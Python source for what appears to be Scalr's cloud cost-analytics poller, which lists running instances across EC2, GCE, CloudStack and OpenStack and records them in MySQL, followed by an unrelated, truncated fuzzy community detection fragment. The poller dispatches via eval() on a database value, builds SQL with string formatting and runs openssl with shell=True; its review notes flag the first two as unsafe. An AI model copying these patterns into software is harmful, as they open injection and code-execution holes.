    Expected cloud/transport failures (auth errors, timeouts, SSL/socket
    problems) are logged as warnings; missing credentials as debug;
    deliberate greenlet kills are ignored; anything else gets a full
    traceback via LOG.exception.

    :param e: the exception instance being handled
    :param msg: pre-formatted context message to log
    """
    # EC2 401/403 means bad/expired credentials -- expected, warn only
    if isinstance(e, boto.exception.EC2ResponseError) and e.status in (401, 403):
        LOG.warning(msg)
    # NOTE(review): libcloud.common.exceptions is not imported explicitly
    # here; presumably pulled in by the libcloud imports above -- confirm.
    elif isinstance(e, (libcloud.common.types.InvalidCredsError,
                        libcloud.common.types.LibcloudError,
                        libcloud.common.types.MalformedResponseError,
                        libcloud.common.exceptions.BaseHTTPError,
                        oauth2client.client.AccessTokenRefreshError,
                        gevent.timeout.Timeout,
                        socket.timeout,
                        socket.gaierror)):
        LOG.warning(msg)
    elif isinstance(e, socket.error):
        LOG.warning(msg)
    # GCE replies 403 when the project rejects the request -- warn only
    elif isinstance(e, googleapiclient.errors.HttpError) and e.resp['status'] in ('403',):
        LOG.warning(msg)
    elif isinstance(e, ssl.SSLError):
        LOG.warning(msg)
    # greenlet was killed on purpose (e.g. poll timeout) -- nothing to log
    elif isinstance(e, greenlet.GreenletExit):
        pass
    elif 'userDisabled' in str(e):
        LOG.warning(msg)
    elif isinstance(e, exceptions.MissingCredentialsError):
        LOG.debug(msg)
    else:
        # unexpected error: keep the traceback for debugging
        LOG.exception(msg)
def _ec2_region(region, cred):
    """
    List running EC2 instances in one region for one credential.

    :param region: AWS region name, e.g. 'us-east-1'
    :param cred: credential record with encrypted 'access_key'/'secret_key'
    :return: {'region': str, 'timestamp': int, 'nodes': list} when nodes
        were found, {} when the region is empty, or None (implicitly)
        when an exception was handled.
    """
    try:
        access_key = cryptotool.decrypt_scalr(app.crypto_key, cred['access_key'])
        secret_key = cryptotool.decrypt_scalr(app.crypto_key, cred['secret_key'])
        kwds = {
            'aws_access_key_id': access_key,
            'aws_secret_access_key': secret_key
        }
        # optional per-platform HTTP proxy
        proxy_settings = app.proxy_settings.get(cred.platform, {})
        kwds['proxy'] = proxy_settings.get('host')
        kwds['proxy_port'] = proxy_settings.get('port')
        kwds['proxy_user'] = proxy_settings.get('user')
        kwds['proxy_pass'] = proxy_settings.get('pass')
        msg = "List nodes for platform: 'ec2', region: '{}', envs_ids: {}"
        msg = msg.format(region, cred.envs_ids)
        LOG.debug(msg)
        conn = boto.ec2.connect_to_region(region, **kwds)
        cloud_nodes = _ec2_get_only_instances(conn)
        timestamp = int(time.time())
        nodes = list()
        for cloud_node in cloud_nodes:
            node = {
                'instance_id': cloud_node.id,
                'instance_type': cloud_node.instance_type,
                # boto reports platform only for Windows; default to linux
                'os': cloud_node.platform if cloud_node.platform else 'linux'
            }
            nodes.append(node)
        return {
            'region': region,
            'timestamp': timestamp,
            'nodes': nodes
        } if nodes else dict()
    except:
        # Python 2 idiom: bare except + sys.exc_info to get the instance
        e = sys.exc_info()[1]
        msg = "platform: '{platform}', region: '{region}', envs_ids: {envs_ids}. Reason: {error}"
        msg = msg.format(platform=cred.platform, region=region, envs_ids=cred.envs_ids,
                         error=helper.exc_info(where=False))
        _handle_exception(e, msg)
def ec2(cred):
    """
    Poll all EC2 regions of the credential's account type concurrently.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    :raises Exception: when cred['account_type'] is not one of
        'regular', 'gov-cloud', 'cn-cloud'
    """
    result = list()
    # the region set depends on which AWS partition the account lives in
    regions = {
        'regular': [
            'us-east-1',
            'us-west-1',
            'us-west-2',
            'eu-west-1',
            'eu-central-1',
            'ap-southeast-1',
            'ap-southeast-2',
            'ap-northeast-1',
            'ap-northeast-2',
            'sa-east-1',
        ],
        'gov-cloud': ['us-gov-west-1'],
        'cn-cloud': ['cn-north-1'],
    }.get(cred.get('account_type'))
    if not regions:
        msg = "Unsupported account type for 'ec2' platform: '{}'".format(cred.get('account_type'))
        raise Exception(msg)
    # fan out one greenlet per region on the shared pool
    app.pool.wait()
    async_results = dict(
        (region, app.pool.apply_async(_ec2_region, args=(region, cred,)))
        for region in regions
    )
    gevent.sleep(0) # force switch
    timeout = app.config['cloud_connection_timeout']
    for region, async_result in async_results.iteritems():
        try:
            region_nodes = async_result.get(timeout=timeout)
            if region_nodes:
                result.append(region_nodes)
        except gevent.timeout.Timeout:
            # kill the stuck greenlet and move on to the next region
            async_result.kill()
            msg = "platform: '{platform}', region: '{region}', envs_ids: {envs_ids}. Reason: timeout"
            msg = msg.format(platform=cred.platform, region=region, envs_ids=cred.envs_ids)
            LOG.warning(msg)
    return result
def _cloudstack(cred):
    """
    List running CloudStack nodes, grouped per zone (location).

    :param cred: credential record with encrypted 'api_key', 'secret_key'
        and 'api_url'
    :return: [{'region': str, 'timestamp': int, 'nodes': list}] with one
        entry per zone that has running nodes, or None (implicitly) when
        an exception was handled.
    """
    try:
        result = list()
        api_key = cryptotool.decrypt_scalr(app.crypto_key, cred['api_key'])
        secret_key = cryptotool.decrypt_scalr(app.crypto_key, cred['secret_key'])
        api_url = cryptotool.decrypt_scalr(app.crypto_key, cred['api_url'])
        # split the endpoint URL into host/port/path for the driver
        url = urlparse.urlparse(api_url)
        splitted_netloc = url.netloc.split(':')
        host = splitted_netloc[0]
        try:
            port = splitted_netloc[1]
        except:
            # no explicit port in the URL; default 443 only for https
            port = 443 if url.scheme == 'https' else None
        path = url.path
        secure = url.scheme == 'https'
        cls = get_driver(Provider.CLOUDSTACK)
        driver = cls(key=api_key, secret=secret_key, host=host, port=port, path=path, secure=secure)
        proxy_url = app.proxy_settings.get(cred.platform, {}).get('url')
        driver.connection.set_http_proxy(proxy_url=proxy_url)
        locations = driver.list_locations()
        cloud_nodes = _libcloud_list_nodes(driver)
        timestamp = int(time.time())
        # bucket running nodes into their zones
        for location in locations:
            nodes = list()
            for cloud_node in cloud_nodes:
                if cloud_node.state != NodeState.RUNNING or cloud_node.extra['zone_id'] != location.id:
                    continue
                node = {
                    'instance_id': cloud_node.id,
                    'instance_type': cloud_node.extra['size_id'],
                    'os': None
                }
                nodes.append(node)
            if nodes:
                result.append(
                    {
                        'region': location.name,
                        'timestamp': timestamp,
                        'nodes': nodes
                    }
                )
        return result
    except:
        # Python 2 idiom: bare except + sys.exc_info to get the instance
        e = sys.exc_info()[1]
        msg = "platform: '{platform}', envs_ids: {envs_ids}. Reason: {error}"
        msg = msg.format(platform=cred.platform, envs_ids=cred.envs_ids,
                         error=helper.exc_info(where=False))
        _handle_exception(e, msg)
def cloudstack(cred):
    """
    Poll a CloudStack cloud on the greenlet pool with a timeout.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
        (empty list on timeout)
    """
    result = list()
    app.pool.wait()
    async_result = app.pool.apply_async(_cloudstack, args=(cred,))
    gevent.sleep(0) # force switch
    try:
        result = async_result.get(timeout=app.config['cloud_connection_timeout'])
    except gevent.timeout.Timeout:
        # kill the stuck greenlet so it does not linger in the pool
        async_result.kill()
        msg = "platform: '{platform}', envs_ids: {envs_ids}. Reason: timeout"
        msg = msg.format(platform=cred.platform, envs_ids=cred.envs_ids)
        LOG.warning(msg)
    return result
def idcf(cred):
    """
    Poll an IDCF cloud (CloudStack-based API; delegates to cloudstack()).

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return cloudstack(cred)
def _gce_key(cred):
    """
    Decrypt and return the GCE service-account private key.

    JSON keys already carry the 'private_key' field; legacy keys are
    base64-encoded PKCS#12 bundles converted to RSA PEM via openssl.
    """
    if cred.get('json_key'):
        key = json.loads(cryptotool.decrypt_scalr(app.crypto_key, cred['json_key']))['private_key']
    else:
        key = cryptotool.decrypt_scalr(app.crypto_key, cred['key'])
        # convert pkcs12 to rsa ('notasecret' is Google's fixed p12 password)
        out, err, ret_code = helper.call(
            "openssl pkcs12 -nodes -nocerts -passin pass:notasecret | openssl rsa",
            input=binascii.a2b_base64(key),
            shell=True
        )
        key = out.strip()
    return key
def _gce_conn(cred, key=None):
    """
    Build an authorized GCE Compute API client.

    :param cred: credential record with encrypted 'service_account_name'
    :param key: private key material; resolved via _gce_key when omitted
    :return: (compute service, authorized httplib2.Http) tuple

    NOTE(review): _gce_key returns an RSA/PEM key, but it is handed to
    from_p12_keyfile_buffer, which by name expects PKCS#12 material --
    confirm against the pinned oauth2client version.
    """
    service_account_name = cryptotool.decrypt_scalr(app.crypto_key, cred['service_account_name'])
    if key is None:
        key = _gce_key(cred)
    credentials = ServiceAccountCredentials.from_p12_keyfile_buffer(
        service_account_name,
        StringIO.StringIO(key),
        scopes=['https://www.googleapis.com/auth/compute']
    )
    http = httplib2.Http()
    http = credentials.authorize(http)
    return build('compute', 'v1', http=http), http
def _gce_zone(zone, key, cred):
    """
    List running GCE instances in one zone for one credential.

    Scalr-managed instances are identified through key=value pairs packed
    into the instance metadata items ('serverid', 'env_id').

    :return: {'region': zone, 'timestamp': int, 'nodes': list} when nodes
        were found, {} when the zone is empty, or None (implicitly) when
        an exception was handled.
    """
    try:
        conn, http = _gce_conn(cred, key=key)
        project_id = cryptotool.decrypt_scalr(app.crypto_key, cred['project_id'])
        request = conn.instances().list(
            project=project_id,
            zone=zone,
            filter='status eq RUNNING'
        )
        resp = request.execute(http=http)
        timestamp = int(time.time())
        cloud_nodes = resp['items'] if 'items' in resp else []
        nodes = list()
        for cloud_node in cloud_nodes:
            node = {
                'instance_id': cloud_node['id'],
                'server_name': cloud_node['name'],
                # machineType is a URL; keep only the trailing type name
                'instance_type': cloud_node['machineType'].split('/')[-1],
                'os': None,
            }
            # scan metadata items for Scalr's 'k=v;k=v' packed markers
            for item in cloud_node['metadata'].get('items', []):
                meta = dict(tuple(element.split('=', 1))
                            for element in item['value'].split(';') if '=' in element)
                if 'serverid' in meta:
                    node['server_id'] = meta['serverid']
                if 'env_id' in meta:
                    node['env_id'] = int(meta['env_id'])
                break
            nodes.append(node)
        return {
            'region': zone,
            'timestamp': timestamp,
            'nodes': nodes
        } if nodes else dict()
    except:
        # Python 2 idiom: bare except + sys.exc_info to get the instance
        e = sys.exc_info()[1]
        msg = "platform: '{platform}', zone: '{zone}', envs_ids: {envs_ids}. Reason: {error}"
        msg = msg.format(platform=cred.platform, zone=zone, envs_ids=cred.envs_ids,
                         error=helper.exc_info(where=False))
        _handle_exception(e, msg)
def gce(cred):
    """
    Poll all GCE zones of the credential's project concurrently.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    result = list()
    project_id = cryptotool.decrypt_scalr(app.crypto_key, cred['project_id'])
    # decrypt/convert the key once and reuse it for every zone greenlet
    key = _gce_key(cred)
    conn, http = _gce_conn(cred, key=key)
    request = conn.zones().list(project=project_id)
    resp = request.execute(http=http)
    zones = [_['name'] for _ in resp['items']] if 'items' in resp else []
    app.pool.wait()
    async_results = dict(
        (zone, app.pool.apply_async(_gce_zone, args=(zone, key, cred,)))
        for zone in zones
    )
    gevent.sleep(0) # force switch
    for zone, async_result in async_results.iteritems():
        try:
            zone_nodes = async_result.get(timeout=app.config['cloud_connection_timeout'] + 1)
            if zone_nodes:
                result.append(zone_nodes)
        except gevent.timeout.Timeout:
            # kill the stuck greenlet and continue with the next zone
            async_result.kill()
            msg = "platform: '{platform}', zone: '{zone}', envs_ids: {envs_ids}. Reason: timeout"
            msg = msg.format(platform=cred.platform, zone=zone, envs_ids=cred.envs_ids)
            LOG.warning(msg)
    return result
def _openstack_cred(cred):
    """
    Decrypt and normalize OpenStack credentials.

    Auth is password-based when the credential record contains a
    'password' field, api-key based otherwise. The keystone URL is
    normalized to end with '/tokens'.

    :param cred: credential record with encrypted fields
    :return: (username, password, auth_version, keystone_url, tenant_name)
        where tenant_name is None when absent from the record
    """
    def decrypt(field):
        # all credential fields are stored encrypted with the app key
        return cryptotool.decrypt_scalr(app.crypto_key, cred[field])

    username = decrypt('username')
    if 'password' in cred:
        password = decrypt('password')
        auth_version = '2.0_password'
    else:
        password = decrypt('api_key')
        auth_version = '2.0_apikey'
    keystone_url = decrypt('keystone_url')
    if not keystone_url.rstrip('/').endswith('/tokens'):
        keystone_url = os.path.join(keystone_url, 'tokens')
    tenant_name = decrypt('tenant_name') if 'tenant_name' in cred else None
    return username, password, auth_version, keystone_url, tenant_name
def _openstack_region(provider, service_name, region, cred):
    """
    List running nodes in one OpenStack region/service for one credential.

    :param provider: libcloud Provider constant
    :param service_name: compute service name from the keystone catalog
    :param region: region name to pin the driver to
    :param cred: credential record (encrypted fields)
    :return: {'region': str, 'timestamp': int, 'nodes': list} when nodes
        were found, {} when empty, or None (implicitly) on handled error.
    """
    try:
        username, password, auth_version, keystone_url, tenant_name = _openstack_cred(cred)
        url = urlparse.urlparse(keystone_url)
        service_type = 'compute'
        cls = get_driver(provider)
        driver = cls(
            username,
            password,
            ex_force_auth_url=url.geturl(),
            ex_tenant_name=tenant_name,
            ex_force_auth_version=auth_version,
            ex_force_service_region=region,
            ex_force_service_type=service_type,
            ex_force_service_name=service_name,
        )
        proxy_url = app.proxy_settings.get(cred.platform, {}).get('url')
        driver.connection.set_http_proxy(proxy_url=proxy_url)
        cloud_nodes = _libcloud_list_nodes(driver)
        # some drivers expose a region attribute; filter defensively, but
        # tolerate drivers that do not have it
        try:
            cloud_nodes = [node for node in cloud_nodes
                           if node.driver.region.upper() == region.upper()]
        except AttributeError:
            pass
        timestamp = int(time.time())
        nodes = list()
        for cloud_node in cloud_nodes:
            if cloud_node.state != NodeState.RUNNING:
                continue
            node = {
                'instance_id': cloud_node.id,
                'instance_type': cloud_node.extra['flavorId'],
                'os': None
            }
            nodes.append(node)
        return {
            'region': region,
            'timestamp': timestamp,
            'nodes': nodes
        } if nodes else dict()
    except:
        # Python 2 idiom: bare except + sys.exc_info to get the instance
        e = sys.exc_info()[1]
        msg = (
            "platform: '{platform}', envs_ids: {envs_ids}, url: '{url}', "
            "tenant_name: '{tenant_name}', service_name='{service_name}', "
            "region: '{region}', auth_version: {auth_version}. Reason: {error}")
        msg = msg.format(
            platform=cred.platform, envs_ids=cred.envs_ids, url=url, tenant_name=tenant_name,
            service_name=service_name, region=region, auth_version=auth_version,
            error=helper.exc_info(where=False))
        _handle_exception(e, msg)
def _openstack(provider, cred):
    """
    Poll every compute service/region pair of an OpenStack cloud.

    Authenticates once to fetch the keystone service catalog, then fans
    out one greenlet per (service_name, region) combination.

    :param provider: libcloud Provider constant
    :param cred: credential record (encrypted fields)
    :return: [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    result = list()
    username, password, auth_version, keystone_url, tenant_name = _openstack_cred(cred)
    url = urlparse.urlparse(keystone_url)
    cls = get_driver(provider)
    driver = cls(
        username,
        password,
        ex_force_auth_url=url.geturl(),
        ex_force_base_url='%s://%s' % (url.scheme, url.netloc),
        ex_tenant_name=tenant_name,
        ex_force_auth_version=auth_version,
    )
    proxy_url = app.proxy_settings.get(cred.platform, {}).get('url')
    driver.connection.set_http_proxy(proxy_url=proxy_url)
    # discover compute services and their regions from the keystone catalog
    service_catalog = _libcloud_get_service_catalog(driver)
    service_names = service_catalog.get_service_names(service_type='compute')
    regions = service_catalog.get_regions(service_type='compute')
    for service_name in service_names:
        app.pool.wait()
        async_results = dict(
            (
                region,
                app.pool.apply_async(
                    _openstack_region,
                    args=(provider, service_name, region, cred)
                )
            ) for region in regions
        )
        gevent.sleep(0) # force switch
        for region, async_result in async_results.iteritems():
            try:
                region_nodes = async_result.get(timeout=app.config['cloud_connection_timeout'] + 1)
                if region_nodes:
                    result.append(region_nodes)
            except gevent.timeout.Timeout:
                # kill the stuck greenlet and continue with the next region
                async_result.kill()
                msg = (
                    "platform: '{platform}', envs_ids: {envs_ids}, url: '{url}', "
                    "tenant_name: '{tenant_name}', service_name='{service_name}', "
                    "region: '{region}', auth_version: {auth_version}. Reason: timeout")
                msg = msg.format(
                    platform=cred.platform, envs_ids=cred.envs_ids, url=url, tenant_name=tenant_name,
                    service_name=service_name, region=region, auth_version=auth_version)
                LOG.warning(msg)
    return result
def openstack(cred):
    """
    Poll a generic OpenStack cloud.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.OPENSTACK, cred)
def rackspacenguk(cred):
    """
    Poll Rackspace UK (next-gen) via the Rackspace driver.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.RACKSPACE, cred)
def rackspacengus(cred):
    """
    Poll Rackspace US (next-gen) via the Rackspace driver.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.RACKSPACE, cred)
def ocs(cred):
    """
    Poll an OCS cloud (OpenStack-compatible API).

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.OPENSTACK, cred)
def nebula(cred):
    """
    Poll a Nebula cloud (OpenStack-compatible API).

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.OPENSTACK, cred)
def mirantis(cred):
    """
    Poll a Mirantis OpenStack cloud.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.OPENSTACK, cred)
def vio(cred):
    """
    Poll a VMware Integrated OpenStack (VIO) cloud.

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.OPENSTACK, cred)
def verizon(cred):
    """
    Poll a Verizon cloud (OpenStack-compatible API).

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.OPENSTACK, cred)
def cisco(cred):
    """
    Poll a Cisco cloud (OpenStack-compatible API).

    :returns: list
        [{'region': str, 'timestamp': int, 'nodes': list}]
    """
    return _openstack(Provider.OPENSTACK, cred)
def sort_nodes(cloud_data, cred, envs_ids):
    """
    Split each region's 'nodes' into 'managed' (known to Scalr) and
    'not_managed' lists, removing the original 'nodes' key in place.

    GCE nodes carry a server_id in metadata and are checked against
    servers_history directly; all other platforms are resolved through
    app.analytics.get_server_id_by_instance_id.

    :param cloud_data: [{'region', 'timestamp', 'nodes'}] from a poller
    :param cred: credential record (provides platform and url field)
    :param envs_ids: environment ids the nodes may belong to
    :return: the same cloud_data list, mutated
    """
    platform = cred.platform
    # gce
    if platform == 'gce':
        query = (
            "SELECT server_id "
            "FROM servers_history "
            "WHERE server_id IN ({})"
        )
        for region_data in cloud_data:
            region_data['managed'] = list()
            region_data['not_managed'] = list()
            servers_ids = [str(node['server_id']) for node in
                           region_data['nodes'] if node.get('server_id')]
            if servers_ids:
                # str(list)[1:-1] renders a quoted, comma-separated IN list
                results = [result['server_id'] for result in
                           app.scalr_db.execute(query.format(str(servers_ids)[1:-1]))]
            else:
                results = []
            for node in region_data['nodes']:
                if node.get('server_id') and node['server_id'] in results and node['env_id'] in envs_ids:
                    region_data['managed'].append(node)
                else:
                    region_data['not_managed'].append(node)
            del region_data['nodes']
        return cloud_data
    # all platforms exclude gce
    url_key = analytics.url_key_map[platform]
    # NOTE(review): the url here is the raw stored credential value, while
    # db_update() decrypts it first -- confirm get_server_id_by_instance_id
    # expects the stored (encrypted) form.
    url = cred[url_key] if url_key else ''
    for region_data in cloud_data:
        cloud_location = region_data['region']
        # resolve instance_id -> server_id in chunks of 200
        for chunk in helper.chunks(region_data['nodes'], 200):
            app.analytics.get_server_id_by_instance_id(chunk, platform, cloud_location,
                                                       envs_ids=envs_ids, url=url)
        region_data['managed'] = list()
        region_data['not_managed'] = list()
        for node in region_data['nodes']:
            if 'server_id' in node:
                region_data['managed'].append(node)
            else:
                region_data['not_managed'].append(node)
        del region_data['nodes']
    return cloud_data
def sorted_data_update(sorted_data):
    """
    Fill in the 'os' field for every node and map it through
    analytics.os_map.

    For managed servers whose poller did not report an OS, the type is
    looked up in the servers table, then server_properties, and finally
    defaults to 'linux' with a warning.

    :param sorted_data: output of sort_nodes(); mutated in place
    """
    for region_data in sorted_data:
        for server in region_data['managed']:
            # poller already supplied an OS (e.g. ec2) -- keep it
            if server.get('os', None) is not None:
                continue
            query = (
                "SELECT os_type os "
                "FROM servers "
                "WHERE server_id='{server_id}'"
            ).format(server_id=server['server_id'])
            result = app.scalr_db.execute(query, retries=1)
            if not result:
                # fall back to the server_properties key/value store
                query = (
                    "SELECT value AS os "
                    "FROM server_properties "
                    "WHERE server_id='{server_id}' "
                    "AND name='os_type'"
                ).format(server_id=server['server_id'])
                result = app.scalr_db.execute(query, retries=1)
            if not result:
                server['os'] = 'linux'
                msg = "Can't detect OS type for server: {0}, set 'linux'".format(
                    server['server_id'])
                LOG.warning(msg)
            else:
                server['os'] = result[0]['os']
        # normalize OS names for both groups via the analytics map
        for server in region_data['managed']:
            server['os'] = analytics.os_map[server.get('os', None)]
        for server in region_data['not_managed']:
            server['os'] = analytics.os_map[server.get('os', None)]
def db_update(sorted_data, envs_ids, cred):
    """
    Record one poller session per (environment, region) and its managed
    servers in the analytics database.

    :param sorted_data: output of sort_nodes()/sorted_data_update()
    :param envs_ids: environment ids to record sessions for
    :param cred: credential record (platform, optional url/account id)

    NOTE(review): the INSERT statements are built via str.format; the
    interpolated values come from Scalr's own DB and cloud metadata, but
    parameterized queries would still be safer -- confirm whether
    app.analytics_db supports them.
    """
    platform = cred.platform
    for env_id in envs_ids:
        query = (
            "SELECT client_id "
            "FROM client_environments "
            "WHERE id={env_id}"
        ).format(env_id=env_id)
        results = app.scalr_db.execute(query, retries=1)
        account_id = results[0]['client_id']
        for region_data in sorted_data:
            try:
                # skip if managed servers not exist
                if not region_data['managed']:
                    continue
                # one poller session row per (env, region) snapshot
                sid = uuid.uuid4()
                if platform == 'ec2':
                    cloud_account = cred.get('account_id')
                else:
                    cloud_account = None
                if analytics.url_key_map[platform]:
                    # normalize the cloud endpoint to 'host/path' form
                    url = urlparse.urlparse(cryptotool.decrypt_scalr(
                        app.crypto_key, cred[analytics.url_key_map[platform]]).rstrip('/'))
                    url = '%s%s' % (url.netloc, url.path)
                else:
                    url = ''
                query = (
                    "INSERT IGNORE INTO poller_sessions "
                    "(sid, account_id, env_id, dtime, platform, url, cloud_location, cloud_account) "
                    "VALUES "
                    "(UNHEX('{sid}'), {account_id}, {env_id}, '{dtime}', '{platform}', '{url}',"
                    "'{cloud_location}', '{cloud_account}')"
                ).format(
                    sid=sid.hex, account_id=account_id, env_id=env_id,
                    dtime=time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(region_data['timestamp'])),
                    platform=platform, url=url, cloud_location=region_data['region'],
                    cloud_account=cloud_account
                )
                app.analytics_db.execute(query, retries=1)
                # managed
                for managed in region_data['managed']:
                    # only servers belonging to this environment
                    if managed['env_id'] != env_id:
                        continue
                    query = (
                        "INSERT IGNORE INTO managed "
                        "(sid, server_id, instance_type, os) VALUES "
                        "(UNHEX('{sid}'), UNHEX('{server_id}'), '{instance_type}', {os})"
                    ).format(
                        sid=sid.hex,
                        server_id=uuid.UUID(managed['server_id']).hex,
                        instance_type=managed['instance_type'],
                        os=managed['os'])
                    app.analytics_db.execute(query, retries=1)
            except:
                # best-effort per region: log and continue with the next one
                helper.handle_error(message='Database update failed')
def process_credential(cred, envs_ids=None):
    """
    Poll one cloud credential end-to-end: fetch running nodes, classify
    them as Scalr-managed or not, and record the result in the analytics
    database.

    :param cred: credential record; cred.platform selects the poller func
    :param envs_ids: environment ids to attribute nodes to; defaults to
        [cred.envs_ids]
    """
    if envs_ids is None:
        envs_ids = [cred.envs_ids]
    try:
        analytics.Credentials.test(cred, cred.platform)
        # SECURITY NOTE(review): dispatch by eval-ing cred.platform as a
        # Python expression. Platform names come from the Scalr DB, but a
        # lookup (e.g. globals()[cred.platform]) would be safer than eval.
        cloud_data = eval(cred.platform)(cred)
        msg = "platform: '{}', envs_ids: {}, cloud data: {}"
        msg = msg.format(cred.platform, envs_ids, cloud_data)
        LOG.debug(msg)
        if cloud_data:
            sorted_data = sort_nodes(cloud_data, cred, envs_ids)
            sorted_data_update(sorted_data)
            db_update(sorted_data, envs_ids, cred)
    except:
        # Python 2 idiom: bare except + sys.exc_info to get the instance
        e = sys.exc_info()[1]
        msg = "platform: '{platform}', environments: {envs}. Reason: {error}"
        msg = msg.format(platform=cred.platform, envs=envs_ids, error=helper.exc_info(where=False))
        _handle_exception(e, msg)
class AnalyticsPoller(application.ScalrIterationApplication):
    """Iteration application that polls cloud platforms for cost analytics.

    Loads environments and their cloud credentials from the Scalr database,
    fans the polling work out to a gevent pool, and stores the results in
    the analytics database.
    """

    def __init__(self, argv=None):
        # description is used by the base application's CLI help output.
        self.description = "Scalr Cost Analytics poller application"
        super(AnalyticsPoller, self).__init__(argv=argv)

        # Defaults for the analytics DB connection; merged with the real
        # deployment values in configure().
        self.config['connections'].update({
            'analytics': {
                'user': None,
                'pass': None,
                'host': None,
                'port': 3306,
                'name': None,
                'pool_size': 50,
            },
        })
        # Application-level defaults, overridable from the scalr config.
        self.config.update({
            'pool_size': 100,
            'interval': 300,
            'cloud_connection_timeout': 10
        })
        # All of these are populated in configure().
        self.scalr_db = None
        self.analytics_db = None
        self.analytics = None
        self.pool = None
        self.crypto_key = None
        self.proxy_settings = {}

    def set_proxy(self):
        """Cache per-platform proxy settings from the scalr configuration."""
        self.proxy_settings = {platform: helper.get_proxy_settings(self.scalr_config, platform)
                               for platform in analytics.PLATFORMS}

    def configure(self):
        """Validate config, open DB connections and prepare the worker pool.

        Exits the process immediately when analytics is disabled.
        """
        enabled = self.scalr_config.get('analytics', {}).get('enabled', False)
        if not enabled:
            sys.stdout.write('Analytics is disabled. Exit\n')
            sys.exit(0)
        # Merge deployment settings over the defaults declared in __init__.
        helper.update_config(
            self.scalr_config.get('analytics', {}).get('connections', {}).get('scalr', {}),
            self.config['connections']['mysql'])
        helper.update_config(
            self.scalr_config.get('analytics', {}).get('connections', {}).get('analytics', {}),
            self.config['connections']['analytics'])
        helper.update_config(
            self.scalr_config.get('analytics', {}).get('poller', {}),
            self.config)
        helper.validate_config(self.config)
        # Keep the pool big enough for the fan-out in do_iteration().
        self.config['pool_size'] = max(11, self.config['pool_size'])
        self.iteration_timeout = self.config['interval'] - self.error_sleep
        # The crypto key lives next to the config file.
        crypto_key_path = os.path.join(os.path.dirname(self.args['--config']), '.cryptokey')
        self.crypto_key = cryptotool.read_key(crypto_key_path)
        self.scalr_db = dbmanager.ScalrDB(self.config['connections']['mysql'])
        self.analytics_db = dbmanager.ScalrDB(self.config['connections']['analytics'])
        self.analytics = analytics.Analytics(self.scalr_db, self.analytics_db)
        self.pool = helper.GPool(pool_size=self.config['pool_size'])
        self.set_proxy()
        # NOTE(review): __init__ only defaults 'cloud_connection_timeout';
        # 'instances_connection_timeout' must be supplied by the merged
        # scalr/poller config or this raises KeyError — confirm.
        socket.setdefaulttimeout(self.config['instances_connection_timeout'])

    def do_iteration(self):
        """Run one polling pass over all environments."""
        for envs in self.analytics.load_envs():
            msg = "Processing environments: {}".format([env['id'] for env in envs])
            LOG.debug(msg)
            try:
                self.analytics.load_env_credentials(envs)
                # Group environments by unique credential so that each cloud
                # account is polled only once per iteration.
                unique = {}
                for env in envs:
                    try:
                        credentials = self.analytics.get_credentials([env])
                        for cred in credentials:
                            # ec2 with detailed billing enabled is processed
                            # by a different pipeline; skip it here.
                            if cred.platform == 'ec2' and env.get('ec2.detailed_billing.enabled', '0') == '1':
                                continue
                            unique.setdefault(cred.unique, {'envs_ids': [], 'cred': cred})
                            unique[cred.unique]['envs_ids'].append(env['id'])
                    except:
                        msg = 'Processing environment: {} failed'.format(env['id'])
                        LOG.exception(msg)
                for data in unique.values():
                    # Backpressure: keep the pool at most ~half full.
                    while len(self.pool) > self.config['pool_size'] * 5 / 10:
                        gevent.sleep(0.1)
                    self.pool.apply_async(process_credential,
                                          args=(data['cred'],),
                                          kwds={'envs_ids': data['envs_ids']})
                    gevent.sleep(0)  # force switch
            except:
                msg = 'Processing environments: {} failed'.format([env['id'] for env in envs])
                LOG.exception(msg)
        self.pool.join()

    def on_iteration_error(self):
        """Abort all in-flight polling greenlets after an iteration failure."""
        self.pool.kill()
def main():
    """Create, configure and run the analytics poller application.

    The clause order below matters: a second running instance is only
    logged, user/system interrupts exit quietly, anything else is an
    unexpected failure and gets a full traceback.
    """
    global app
    app = AnalyticsPoller()
    try:
        app.load_config()
        app.configure()
        app.run()
    except exceptions.AlreadyRunningError:
        # Another poller instance already holds the lock; log and exit.
        LOG.info(helper.exc_info())
    except (SystemExit, KeyboardInterrupt):
        pass
    except:
        LOG.exception('Oops')


if __name__ == '__main__':
    main()
|
import numpy as np
import networkx as nx
from collections import defaultdict
"""
Reference implementation
https://github.com/nidhisridhar/Fuzzy-Community-Detection
"""
def __reachable(i, theta_cores, fuzz_d, visited):
    """Return indices (into theta_cores) of cores reachable from theta_cores[i].

    Breadth-first style expansion over the fuzzy membership matrix: core j
    is adjacent to core k when fuzz_d[theta_cores[k]][theta_cores[j]] > 0.

    :param i: index of the seed core within theta_cores
    :param theta_cores: array of vertex ids that qualified as theta-cores
    :param fuzz_d: normalized fuzzy membership matrix (vertex x vertex)
    :param visited: 0/1 array over cores, mutated in place as cores are found
    :return: numpy array of reachable core indices (i itself excluded)
    """
    reach = []
    flag = True
    index = -1
    num_cores = len(theta_cores)
    while flag:
        # Stop once the scan pointer has consumed everything discovered so far.
        if index == len(reach):
            flag = False
        if index == -1:
            # First pass: expand from the seed core i.
            flag = False
            for j in range(num_cores):
                if visited[j] == 0 and i != j:
                    if fuzz_d[theta_cores[i]][theta_cores[j]] > 0:
                        visited[j] = 1
                        reach.append(j)
                        flag = True
        else:
            # Subsequent passes expand from position `index`.
            # NOTE(review): this indexes theta_cores by the loop counter
            # `index`, not by reach[index] — looks suspicious; verify
            # against the reference implementation linked above.
            for j in range(num_cores):
